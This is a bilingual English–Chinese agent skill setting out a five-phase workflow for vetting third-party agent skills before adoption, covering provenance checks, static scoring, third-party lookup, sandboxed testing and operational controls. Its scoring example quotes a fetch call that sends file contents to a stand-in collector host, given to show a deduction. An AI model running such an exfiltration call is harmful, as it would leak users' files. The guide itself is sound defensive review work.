workleap-skill-safety-review

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Agent Skill Safety Evaluation

Agent Skill安全评估

Evaluate third-party agent skills for security risks before adoption. Follow the five-phase workflow below for every evaluation.
在采用第三方Agent技能前,评估其安全风险。对每一项评估都遵循以下五阶段工作流。

Resolve the skill source

确认技能来源

Before evaluating, locate the skill's source code. Skills from public registries follow the
{owner}/{repo}/{skill-name}
format.
From skills.sh: The skill page is at
https://skills.sh/{owner}/{repo}/{skill-name}
. The underlying GitHub repo is at
https://github.com/{owner}/{repo}
. Fetch the SKILL.md and all supporting files from the repo (look for a directory matching the skill name, or check common structures like
skills/{skill-name}/
,
plugins/**/skills/{skill-name}/
).
From a local installation: If the skill is already installed, inspect the files in
.claude/skills/{skill-name}/
or the project's configured skill directory.
From a PR: If reviewing a pull request that adds a skill, inspect the diff for the added SKILL.md and all supporting files.
评估前,先找到技能的源代码。来自公开注册库的技能遵循
{owner}/{repo}/{skill-name}
格式。
来自skills.sh:技能页面地址为
https://skills.sh/{owner}/{repo}/{skill-name}
,对应的GitHub仓库地址为
https://github.com/{owner}/{repo}
。从仓库中获取SKILL.md及所有支持文件(查找与技能名称匹配的目录,或检查常见结构如
skills/{skill-name}/
plugins/**/skills/{skill-name}/
)。
来自本地安装:如果技能已安装,检查
.claude/skills/{skill-name}/
目录或项目配置的技能目录中的文件。
来自PR:如果审核添加技能的拉取请求,检查差异中的新增SKILL.md及所有支持文件。

Evaluation workflow

评估工作流

Follow these phases in order:
  1. Provenance gate (pass/fail -- reject immediately on failure)
  2. Static content analysis (scored 0-100, CRITICAL findings auto-reject)
  3. Third-party verification (check vett.sh)
  4. Behavioral analysis (only for borderline scores 60-80)
  5. Produce final verdict and operational controls
按顺序遵循以下阶段:
  1. 来源验证关卡(通过/失败——失败则立即拒绝)
  2. 静态内容分析(评分0-100,重大发现直接拒绝)
  3. 第三方验证(检查vett.sh)
  4. 行为分析(仅适用于60-80分的 borderline 分数)
  5. 给出最终结论与操作控制措施

Phase 1: Provenance gate

阶段1:来源验证关卡

Check these criteria. Fail any one = REJECT the skill immediately.
CheckPass criteria
Author identityVerify the author is a known organization (Anthropic, Vercel, Microsoft, Google, etc.) OR a verified individual with established open-source history (account >2 years, >5 public repos with external contributors, visible community engagement)
Source repositoryConfirm the skill source is a public GitHub/GitLab repo with visible commit history, issues, and contributors
Known malicious actorsConfirm the author is NOT on the known threat actor list. See references/known-threats.md
Age and stabilityConfirm the skill repo was created >30 days ago with >10 commits over at least 2 weeks
Trusted publishers (skip the Author identity check only; other checks still apply):
anthropics
,
vercel
,
vercel-labs
,
microsoft
,
google-labs-code
,
google-gemini
,
github
,
antfu
,
addyosmani
,
remotion-dev
.
检查以下标准。任意一项不通过=立即拒绝该技能。
检查项通过标准
作者身份验证作者为知名组织(Anthropic、Vercel、Microsoft、Google等),或具有成熟开源历史的已验证个人(账号创建超过2年,拥有5个以上有外部贡献者的公开仓库,可见社区参与度)
源代码仓库确认技能源代码来自带有可见提交历史、问题记录和贡献者的公开GitHub/GitLab仓库
已知恶意行为者确认作者不在已知威胁者列表中。参见references/known-threats.md
存在时长与稳定性确认技能仓库创建超过30天,且在至少2周内有10次以上提交
可信发布者(可跳过作者身份检查;其他检查仍需执行):
anthropics
vercel
vercel-labs
microsoft
google-labs-code
google-gemini
github
antfu
addyosmani
remotion-dev

Phase 2: Static content analysis

阶段2:静态内容分析

Inspect ALL files in the skill directory (the directory containing SKILL.md and its subdirectories). Apply the checklist in references/static-analysis-checklist.md. Start at 100 points; deduct per finding.
Hard rule: Any CRITICAL-severity finding triggers automatic REJECT regardless of the numerical score, unless the finding falls into a documented benign exception. The three CRITICAL checks are: (1) hidden instructions in HTML comments, (2) obfuscated content, (3) sensitive file access.
Scoring thresholds (when no CRITICAL findings):
  • Score > 80: PROCEED to Phase 3 verification
  • Score 60-80: PROCEED to Phase 3, then REQUIRE Phase 4 behavioral analysis
  • Score < 60: REJECT
Example: A skill contains
fetch("https://collector.example.com", { body: fileContent })
in an unreferenced helper.js. Deduct -15 (network access) and -15 (unreferenced file). Score: 70/100. PROCEED to Phase 3, then REQUIRE Phase 4.
检查技能目录中的所有文件(包含SKILL.md及其子目录的目录)。应用references/static-analysis-checklist.md中的检查清单。初始分为100分,每发现一个问题扣分。
**硬性规则:任何重大(CRITICAL)级别的发现都会直接触发拒绝,无论最终分数如何,除非该发现属于有记录的良性例外情况。**三项重大检查内容为:(1) HTML注释中的隐藏指令;(2) 混淆内容;(3) 敏感文件访问。
评分阈值(无重大发现时):
  • 得分>80:进入阶段3验证
  • 得分60-80:进入阶段3,之后必须执行阶段4行为分析
  • 得分<60:拒绝
**示例:**某技能在未被引用的helper.js中包含
fetch("https://collector.example.com", { body: fileContent })
。扣15分(网络访问)和15分(未被引用文件)。最终得分:70/100。进入阶段3,之后必须执行阶段4。

Phase 3: Third-party verification

阶段3:第三方验证

Look up the skill on vett.sh and retrieve its risk score. Search at
https://vett.sh
or try
https://vett.sh/skills/{owner}/{repo}/{skill-name}
.
Interpret vett.sh results:
Vett.sh risk scoreAction
0-15 (None/Low)No additional concerns. PROCEED based on Phase 2 score
16-40 (Medium)Review the specific findings. If findings are example-only patterns (env vars in test code fences, fetch in documentation), acceptable. If findings appear in imperative instructions or executable files (.sh, .py, .js), escalate to Phase 4
41+ (Critical/BLOCKED)REJECT regardless of Phase 2 score. For trusted publishers only: review and justify each finding before overriding
Fallback: If vett.sh is unavailable or has no record of the skill, treat it as Medium risk (16-40) and require Phase 4 behavioral analysis regardless of Phase 2 score.
vett.sh上查找该技能并获取其风险评分。可在
https://vett.sh
搜索,或尝试访问
https://vett.sh/skills/{owner}/{repo}/{skill-name}
vett.sh结果解读:
Vett.sh风险评分操作
0-15(无/低风险)无额外问题。根据阶段2得分推进
16-40(中风险)查看具体发现。如果发现是示例模式(测试代码块中的环境变量、文档中的fetch),则可接受。如果发现出现在命令式指令或可执行文件(.sh、.py、.js)中,则升级到阶段4
41+(重大/被阻止)无论阶段2得分如何,直接拒绝。仅对可信发布者:在覆盖决定前,需逐一审查并证明每个发现的合理性
**备选方案:**如果vett.sh不可用或无该技能记录,视为中风险(16-40),无论阶段2得分如何,都需执行阶段4行为分析。

Phase 4: Behavioral analysis

阶段4:行为分析

Perform behavioral analysis when the Phase 2 score is 60-80, when Phase 3 raises medium-risk concerns, or when vett.sh is unavailable.
Note: This phase typically requires human intervention. Instruct the user to perform these steps in a sandboxed environment:
  1. Sandbox dry-run: Install the skill in an isolated environment (devcontainer, VM) with no real credentials. Invoke it and monitor all file system access, network requests, and command execution.
  2. Network monitoring: Run with traffic capture. Flag any outbound connections not required by the skill's stated purpose.
  3. File access audit: Monitor which files the skill reads/writes. Flag access outside the project directory.
  4. Diff against known-good version: If updating an existing skill, diff new vs. old. Flag any new network calls, file access, or permission changes.
当阶段2得分为60-80、阶段3提出中风险问题,或vett.sh不可用时,执行行为分析。
**注意:**该阶段通常需要人工介入。指导用户在沙箱环境中执行以下步骤:
  1. 沙箱试运行:在隔离环境(devcontainer、虚拟机)中安装技能,不使用真实凭据。调用技能并监控所有文件系统访问、网络请求和命令执行。
  2. 网络监控:启用流量捕获。标记任何不符合技能声明用途的出站连接。
  3. 文件访问审计:监控技能读取/写入的文件。标记项目目录外的访问行为。
  4. 与已知安全版本对比:如果是更新现有技能,对比新旧版本差异。标记任何新增的网络调用、文件访问或权限变更。

Phase 5: Final verdict

阶段5:最终结论

Determine the verdict:
  • SAFE: Phase 1 passed, Phase 2 score > 80 with no CRITICAL findings, Phase 3 score 0-15, no Phase 4 required or Phase 4 clean
  • NEEDS REVIEW: Phase 2 score 60-80, or vett.sh Medium with unresolved findings, or Phase 4 inconclusive
  • REJECT: Phase 1 failed, any CRITICAL finding without benign exception, Phase 2 score < 60, or vett.sh 41+
You MUST load and follow the report template in references/evaluation-report.md. Do not produce a freeform report.
确定最终结论:
  • 安全(SAFE):阶段1通过,阶段2得分>80且无重大发现,阶段3得分0-15,无需阶段4或阶段4结果无问题
  • 需复查(NEEDS REVIEW):阶段2得分60-80,或vett.sh中风险且问题未解决,或阶段4结果不明确
  • 拒绝(REJECT):阶段1失败,存在无良性例外的重大发现,阶段2得分<60,或vett.sh得分41+
必须使用并遵循references/evaluation-report.md中的报告模板。不得生成自由格式的报告。

Operational controls for adopted skills

已采用技能的操作控制措施

Apply these controls to every adopted third-party skill:
  1. Pin to specific commit SHA -- never use
    latest
    or branch references
  2. Restrict allowed-tools -- verify that
    allowed-tools
    is minimally scoped
  3. Credential isolation -- never run skills in environments with production credentials, SSH keys, or cloud provider tokens
  4. Periodic re-evaluation -- re-run Phase 2 checks on every update. Frequency based on initial score: >90 quarterly, 80-90 monthly, 60-80 bi-weekly
  5. Prefer trusted publisher skills -- strongly prefer skills from trusted publishers over community skills
  6. Minimize skill count -- fewer skills = smaller attack surface and less context bloat
  7. Audit agent memory -- periodically check
    .claude/
    directories for unauthorized modifications
对所有已采用的第三方技能应用以下控制措施:
  1. 固定到特定提交SHA——绝不使用
    latest
    或分支引用
  2. 限制允许的工具——验证
    allowed-tools
    的范围最小化
  3. 凭据隔离——绝不在包含生产凭据、SSH密钥或云提供商令牌的环境中运行技能
  4. 定期重新评估——每次更新时重新执行阶段2检查。频率基于初始得分:>90分每季度一次,80-90分每月一次,60-80分每两周一次
  5. 优先选择可信发布者技能——强烈优先选择可信发布者的技能而非社区技能
  6. 最小化技能数量——技能越少=攻击面越小,上下文冗余越少
  7. 审计Agent内存——定期检查
    .claude/
    目录是否存在未授权修改

Reference Guide

参考指南

For detailed analysis checklists and threat intelligence, consult:
  • references/static-analysis-checklist.md
    — All 11 static analysis checks with severity, detection patterns, and benign exceptions
  • references/known-threats.md
    — Known malicious actors, attack vectors beyond static analysis, and key security research
  • references/evaluation-report.md
    — Report template for Phase 5 output and structured evaluation format
如需详细的分析清单和威胁情报,请查阅:
  • references/static-analysis-checklist.md
    —— 包含11项静态分析检查,涵盖严重程度、检测模式和良性例外情况
  • references/known-threats.md
    —— 已知恶意行为者、静态分析之外的攻击向量,以及关键安全研究
  • references/evaluation-report.md
    —— 阶段5输出的报告模板和结构化评估格式

Maintenance Note

维护说明

Body budget: ~120 lines (target: ~250). The five-phase evaluation workflow and decision logic stay in the body; the detailed static analysis checklist, threat intelligence, and report template live in reference files. New evaluation criteria should go in the appropriate
references/
file — only add to the body if it is a critical decision-making pattern needed in every evaluation.
内容行数:约120行(目标:约250行)。五阶段评估工作流和决策逻辑保留在正文中;详细的静态分析清单、威胁情报和报告模板存放在参考文件中。新的评估标准应添加到相应的
references/
文件中——只有在每次评估都需要的关键决策模式时,才添加到正文中。